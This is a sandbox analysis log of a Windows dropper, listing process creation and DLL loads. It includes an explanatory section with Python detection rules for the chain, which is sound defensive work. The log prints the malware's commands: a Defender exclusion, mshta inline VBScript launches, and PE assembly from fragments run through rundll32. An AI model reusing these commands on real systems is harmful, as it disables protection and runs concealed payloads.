                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 872
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\control.exe control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 900
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 1064
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Process created: C:\Users\user\AppData\Local\Temp\setup_installer.exe "C:\Users\user\AppData\Local\Temp\setup_installer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon178817e243.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe Mon17742f90b916675f2.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Mon17eac6d534bfd22c7.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe Mon17c604381c7047e.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Mon17e1fac3fd3d84b.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe Mon17b5f403be4d8d6b.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe Mon17f45359eb9.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Mon1785436ae78.exe /mixone
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Mon17948100733a95c58.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Mon179e1058f256.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe Mon1795d04d4bd.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Mon178817e243.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\09xU.exE 9xU.EXE -pPtzyIkqLZoCarb5ew
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\control.exe control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
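Read in order, the process listing above is a complete launcher chain: a Defender exclusion for the user's Temp directory before any payload runs, the 7-Zip SFX (setup_install.exe under 7zS8BD79F65) starting each Mon17* payload through cmd /c, Mon17e1fac3fd3d84b.exe relaunching itself through mshta with an inline vbscript: URI (no .hta on disk, random letter case in every keyword), copying itself as 09xU.exE and taskkill'ing the original (taskkill accepts '-Im' as '/IM', which the WMI query above confirms), then rebuilding a PE from headerless fragments (echo | set /p writes the two bytes MZ, copy /b splices the body on) and loading it through control.exe and rundll32 Shell32.dll,Control_RunDLL, which loads whatever file it is handed as a Control Panel DLL. Each step leaves a process-creation event a detection can key on. The following is an added example, not part of the report or of the sample: five rules over a constructed list of process-creation records. ProcEvent and its field names are an assumption standing in for a Sysmon or EDR record; the command lines in events 0 to 4 are taken from the listing above, and events 5 and 6 are constructed benign controls.

```python
"""Process-creation detection for the launcher chain shown in the report.

Added example, not Joe Sandbox code and not from the sample. ProcEvent and
CONSTRUCTED_EVENTS are assumptions: a minimal stand-in for a Sysmon/EDR
process-creation record, populated with command lines from the report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image of the creating process
    image: str    # image of the created process
    cmdline: str  # command line exactly as recorded


def _base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Every rule lower-cases the command line first: the chain randomises letter case
# ("VbsCRiPT", "CoPY /b /Y", "taskkill -Im") precisely to defeat exact-string matching.

def defender_exclusion(e: ProcEvent) -> bool:
    """powershell Add-MpPreference -ExclusionPath: carves a blind spot before the payloads drop."""
    c = e.cmdline.lower()
    return _base(e.image) == "powershell.exe" and "add-mppreference" in c and "-exclusionpath" in c


def mshta_inline_script(e: ProcEvent) -> bool:
    """mshta.exe given a vbscript:/javascript: URI runs script without any .hta file on disk."""
    return _base(e.image) == "mshta.exe" and re.search(r"\b(vbscript|javascript):", e.cmdline, re.I) is not None


def pe_assembled_from_chunks(e: ProcEvent) -> bool:
    """'set /p ="MZ" > hdr' followed by 'copy /b hdr + a + b out': a PE rebuilt from headerless fragments."""
    c = e.cmdline.lower()
    writes_mz = re.search(r'set\s*/p\s*=\s*"?mz"?\s*\d?>', c) is not None
    concat = re.search(r"copy\s+(/[by]\s+)+\S+(\s*\+\s*\S+)+", c) is not None
    return _base(e.image) == "cmd.exe" and writes_mz and concat


def control_panel_proxy_exec(e: ProcEvent) -> bool:
    """rundll32 Shell32.dll,Control_RunDLL <file> loads <file> as a DLL; genuine applets end in .cpl."""
    c = e.cmdline.lower()
    if _base(e.image) != "rundll32.exe" or "control_rundll" not in c:
        return False
    target = c.split("control_rundll", 1)[1].strip()
    return not target.endswith(".cpl")


def self_relaunch_and_kill(e: ProcEvent) -> bool:
    """cmd copies the caller under a new name, starts it, then taskkill /F's the original ('-Im' == '/IM')."""
    c = e.cmdline.lower()
    return _base(e.image) == "cmd.exe" and "copy /y" in c and re.search(r"taskkill\s+[/-]f\b", c) is not None


RULES = {
    "defender_exclusion": defender_exclusion,
    "mshta_inline_script": mshta_inline_script,
    "pe_assembled_from_chunks": pe_assembled_from_chunks,
    "control_panel_proxy_exec": control_panel_proxy_exec,
    "self_relaunch_and_kill": self_relaunch_and_kill,
}


def evaluate(events):
    """Map each rule that fired to the indices of the events it matched."""
    hits = {}
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                hits.setdefault(name, []).append(i)
    return hits


# Constructed input: events 0-4 carry command lines from the report's listing; 5 and 6 are benign controls.
CONSTRUCTED_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"'),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe", r"C:\Windows\SysWOW64\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )'),
    ProcEvent(r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"'),
    ProcEvent(r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I'),
    ProcEvent(r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL desk.cpl'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c copy /y report.txt report.bak"),
]
```

`evaluate(CONSTRUCTED_EVENTS)` fires exactly one rule per malicious event and none on the two controls; the Control_RunDLL rule keys on the extension rather than the path because the applet name is attacker-chosen, and the MZ rule tolerates the `1>` redirection form that cmd.exe itself records when it re-spawns for the `SET /P` half of the pipeline.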
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: libwinpthread-1.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: libcurlpp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: libcurl.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: libcurl.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: libgcc_s_dw2-1.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: libstdc++-6.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: libgcc_s_dw2-1.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
